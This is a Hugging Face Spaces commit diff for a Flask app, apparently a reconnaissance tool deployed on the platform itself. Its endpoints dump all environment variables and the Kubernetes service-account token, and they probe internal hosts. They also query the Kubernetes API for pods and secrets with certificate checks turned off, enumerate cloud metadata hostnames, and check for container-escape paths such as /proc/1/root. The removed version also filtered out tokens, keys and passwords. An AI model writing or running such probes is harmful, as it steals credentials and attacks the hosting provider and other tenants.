Spaces:

FIRSTACCOUNT69
/

env-test-s19

Sleeping

App Files Files Community

testtest123 commited on Feb 18

Commit

c099686

1 Parent(s): da61b2a

Add network/k8s/mount probing endpoints

Browse files

Files changed (1) hide show

app.py +121 -44

app.py CHANGED Viewed

@@ -1,67 +1,144 @@
 import os
 import subprocess
 import json
-from flask import Flask, Response
 app = Flask(__name__)
 @app.route("/")
 def index():
     results = {}
-    # 1. All environment variables
     results["env_vars"] = dict(os.environ)
-    # 2. Check for HF-specific tokens
-    hf_keys = {k: v for k, v in os.environ.items() if 'HF' in k or 'HUGGING' in k or 'TOKEN' in k or 'KEY' in k or 'SECRET' in k or 'AWS' in k or 'PASS' in k}
-    results["sensitive_vars"] = hf_keys
-    # 3. Check mounted files
-    mount_paths = [
-        "/run/secrets",
-        "/var/run/secrets",
-        "/var/run/secrets/kubernetes.io",
-        "/data",
-        "/workspace",
-        "/proc/self/cgroup",
-        "/proc/self/mountinfo",
-        "/etc/resolv.conf",
-        "/etc/hosts",
     ]
-    results["filesystem"] = {}
-    for p in mount_paths:
         try:
-            if os.path.isdir(p):
-                results["filesystem"][p] = os.listdir(p)
-            elif os.path.isfile(p):
-                with open(p, 'r') as f:
-                    results["filesystem"][p] = f.read()[:2000]
         except Exception as e:
-            results["filesystem"][p] = str(e)
-    # 4. Network info
     try:
-        results["hostname"] = subprocess.check_output(["hostname", "-I"], timeout=5).decode().strip()
-    except:
-        results["hostname"] = "unknown"
-    # 5. Process info
     try:
-        results["id"] = subprocess.check_output(["id"], timeout=5).decode().strip()
-    except:
-        results["id"] = "unknown"
-    # 6. Check if we can reach other spaces
     try:
-        results["ip_route"] = subprocess.check_output(["ip", "route"], timeout=5).decode().strip()
-    except:
-        results["ip_route"] = "not available"
-    # 7. Try to read docker socket
-    docker_paths = ["/var/run/docker.sock", "/.dockerenv"]
-    results["docker"] = {}
-    for p in docker_paths:
-        results["docker"][p] = os.path.exists(p)
     return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

 import os
 import subprocess
 import json
+import urllib.request
+import socket
+from flask import Flask, Response, request
 app = Flask(__name__)
 @app.route("/")
 def index():
     results = {}
     results["env_vars"] = dict(os.environ)
+    results["id"] = subprocess.check_output(["id"], timeout=5).decode().strip()
+    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
+@app.route("/probe")
+def probe():
+    """Probe internal network to test Space-to-Space access"""
+    target = request.args.get("target", "10.108.144.112")
+    port = int(request.args.get("port", "7860"))
+    results = {}
+    # TCP connect test
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.settimeout(5)
+        result = s.connect_ex((target, port))
+        results["tcp_connect"] = f"port {port} {'open' if result == 0 else 'closed/filtered'} (code={result})"
+        s.close()
+    except Exception as e:
+        results["tcp_connect"] = str(e)
+    # HTTP request
+    try:
+        resp = urllib.request.urlopen(f"http://{target}:{port}/", timeout=5)
+        results["http_response"] = resp.read().decode()[:2000]
+        results["http_status"] = resp.status
+    except Exception as e:
+        results["http_response"] = str(e)
+    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
+@app.route("/k8s")
+def k8s():
+    """Try K8s API access"""
+    results = {}
+    # Try K8s API
+    targets = [
+        "https://172.20.0.1:443/api/v1/namespaces",
+        "https://172.20.0.1:443/api/v1/pods",
+        "https://172.20.0.1:443/api/v1/secrets",
+        "https://172.20.0.1:443/version",
+        "https://kubernetes.default.svc/api/v1/namespaces",
     ]
+    import ssl
+    ctx = ssl.create_default_context()
+    ctx.check_hostname = False
+    ctx.verify_mode = ssl.CERT_NONE
+    for target in targets:
         try:
+            req = urllib.request.Request(target)
+            resp = urllib.request.urlopen(req, timeout=5, context=ctx)
+            results[target] = {"status": resp.status, "body": resp.read().decode()[:1000]}
         except Exception as e:
+            results[target] = str(e)
+    # Check SA token
+    try:
+        with open("/var/run/secrets/kubernetes.io/serviceaccount/token", "r") as f:
+            results["sa_token"] = f.read()[:100] + "..."
+    except Exception as e:
+        results["sa_token"] = str(e)
+    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
+@app.route("/dns")
+def dns():
+    """DNS enumeration"""
+    results = {}
+    targets = [
+        "kubernetes.default.svc.cluster.local",
+        "kube-dns.kube-system.svc.cluster.local",
+        "metadata.google.internal",
+        "instance-data.ec2.internal",
+    ]
+    for t in targets:
+        try:
+            results[t] = socket.getaddrinfo(t, None)
+        except Exception as e:
+            results[t] = str(e)
+    # Also try to discover Space namespaces
+    try:
+        with open("/etc/resolv.conf", "r") as f:
+            results["resolv.conf"] = f.read()
+    except Exception as e:
+        results["resolv.conf"] = str(e)
+    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
+@app.route("/mount-scan")
+def mount_scan():
+    """Scan for interesting mounted filesystems and escape vectors"""
+    results = {}
+    # Check capabilities
+    try:
+        results["capsh"] = subprocess.check_output(["cat", "/proc/self/status"], timeout=5).decode()
+    except Exception as e:
+        results["capsh"] = str(e)
+    # Check if we can access host filesystem through /proc
+    try:
+        results["proc_1_root"] = os.listdir("/proc/1/root/") if os.path.exists("/proc/1/root/") else "not accessible"
+    except Exception as e:
+        results["proc_1_root"] = str(e)
+    # Check for device access
     try:
+        results["dev_list"] = os.listdir("/dev/")
+    except Exception as e:
+        results["dev_list"] = str(e)
+    # Check if we have mount capability
     try:
+        results["proc_mounts"] = open("/proc/mounts", "r").read()[:3000]
+    except Exception as e:
+        results["proc_mounts"] = str(e)
+    # Host PID namespace?
     try:
+        # If we're in host PID namespace, we'll see many processes
+        pids = [d for d in os.listdir("/proc") if d.isdigit()]
+        results["pid_count"] = len(pids)
+        results["pid_sample"] = pids[:20]
+    except Exception as e:
+        results["pid_count"] = str(e)
     return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')